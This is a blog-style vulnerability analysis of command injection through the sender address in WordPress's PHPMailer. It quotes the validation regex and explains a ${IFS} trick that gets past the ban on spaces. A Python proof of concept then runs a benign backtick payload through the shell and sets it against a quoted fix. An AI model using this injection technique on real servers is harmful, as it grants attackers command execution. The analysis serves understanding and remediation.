WordPress Email Newsletter Unspecified Security Vulnerability
I was skimming through securityfocus.com when I saw a post on “WordPress Unspecified Mail Vulnerability.” The complete lack of details was interesting, so I dug up the changelist.
In this case ‘unspecified’ means ‘command execution.’ In the original version, $this->Sender is set to the address passed to SetFrom. SendMail then splices that value, unescaped, into the argument string handed to the sendmail binary, so whatever survives address validation is interpreted by the shell.
This vulnerability is only useful to someone who already has partial admin rights (enough to set the sender address). It is also limited to payloads that pass the following regex: spaces are rejected, but backticks are permitted in the local part, which makes it exploitable on *nix environments. Note that $, { and } are permitted as well, so the missing space can be supplied by ${IFS} inside the backticks.
preg_match('/^(?:[\w\!\#\$\%\&\'\*\+\-\/\=\?\^\`\{\|\}\~]+\.)*[\w\!\#\$\%\&\'\*\+\-\/\=\?\^\`\{\|\}\~]+@(?:(?:(?:[a-zA-Z0-9_](?:[a-zA-Z0-9_\-](?!\.)){0,61}[a-zA-Z0-9_-]?\.)+[a-zA-Z0-9_](?:[a-zA-Z0-9_\-](?!$)){0,61}[a-zA-Z0-9_]?)|(?:\[(?:(?:[01]?\d{1,2}|2[0-4]\d|25[0-5])\.){3}(?:[01]?\d{1,2}|2[0-4]\d|25[0-5])\]))$/', $address);
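To see what the regex actually lets through, here is the check transcribed into Python (added example, not code from the post or from WordPress/PHPMailer). It runs the validator over a harmless backtick payload, then shows the difference between interpolating the sender verbatim into the command line and quoting it. The sendmail path is replaced with echo so the output is exactly the argument list the shell delivered; the sprintf-style "-oi -f %s -t" layout and the shlex.quote fix are assumptions for illustration, not the project's code.

```python
import re
import shlex
import subprocess

# The PHPMailer address check quoted in the post, transcribed into Python.
# PCRE and Python's re agree on every construct used here; re.ASCII keeps \w
# at [A-Za-z0-9_], as PCRE has it without the /u modifier.
LOCAL_CLASS = r"[\w!#$%&'*+\-/=?^`{|}~]"
ADDRESS_RE = re.compile(
    "^(?:" + LOCAL_CLASS + r"+\.)*" + LOCAL_CLASS + "+@"
    + r"(?:(?:(?:[a-zA-Z0-9_](?:[a-zA-Z0-9_\-](?!\.)){0,61}[a-zA-Z0-9_-]?\.)+"
    + r"[a-zA-Z0-9_](?:[a-zA-Z0-9_\-](?!$)){0,61}[a-zA-Z0-9_]?)"
    + r"|(?:\[(?:(?:[01]?\d{1,2}|2[0-4]\d|25[0-5])\.){3}"
    + r"(?:[01]?\d{1,2}|2[0-4]\d|25[0-5])\]))$",
    re.ASCII,
)


def validate_address(address: str) -> bool:
    """True if the address passes the regex; this is the only gate on Sender."""
    return ADDRESS_RE.match(address) is not None


# Stand-in for the mailer binary (assumption): echo prints the argument list
# the shell actually delivered, which is what we want to inspect.
SENDMAIL = "echo"


def vulnerable_command(sender: str) -> str:
    """Sender spliced into the command line verbatim, as the post describes."""
    return f"{SENDMAIL} -oi -f {sender} -t"


def hardened_command(sender: str) -> str:
    """Same layout, but the sender is shell-quoted (Python's analogue of escapeshellarg)."""
    return f"{SENDMAIL} -oi -f {shlex.quote(sender)} -t"


def run_through_shell(command: str):
    """Execute the command line with sh -c, as PHP's popen()/exec would. None if sh is missing."""
    try:
        out = subprocess.run(["sh", "-c", command], capture_output=True, text=True, timeout=5)
    except FileNotFoundError:
        return None
    return out.stdout.strip()


# Constructed inputs. PAYLOAD contains no space: ${IFS} supplies one inside the
# backticks, and every character it uses is in the regex's local-part class.
PAYLOAD = "`echo${IFS}injected`@example.com"
SPACED = "`echo injected`@example.com"   # a literal space fails the regex
PLAIN = "user@example.com"


def demo() -> dict:
    return {
        "plain_valid": validate_address(PLAIN),
        "payload_valid": validate_address(PAYLOAD),
        "spaced_valid": validate_address(SPACED),
        "vulnerable": run_through_shell(vulnerable_command(PAYLOAD)),
        "hardened": run_through_shell(hardened_command(PAYLOAD)),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

With the verbatim command line the shell runs the backtick substitution first, so sendmail (here, echo) receives "-f injected@example.com"; with the quoted version it receives the payload as a literal string. Quoting for the shell is the minimum fix; the more robust design is to never build a shell command line from user data at all and instead exec the binary directly with an argument vector.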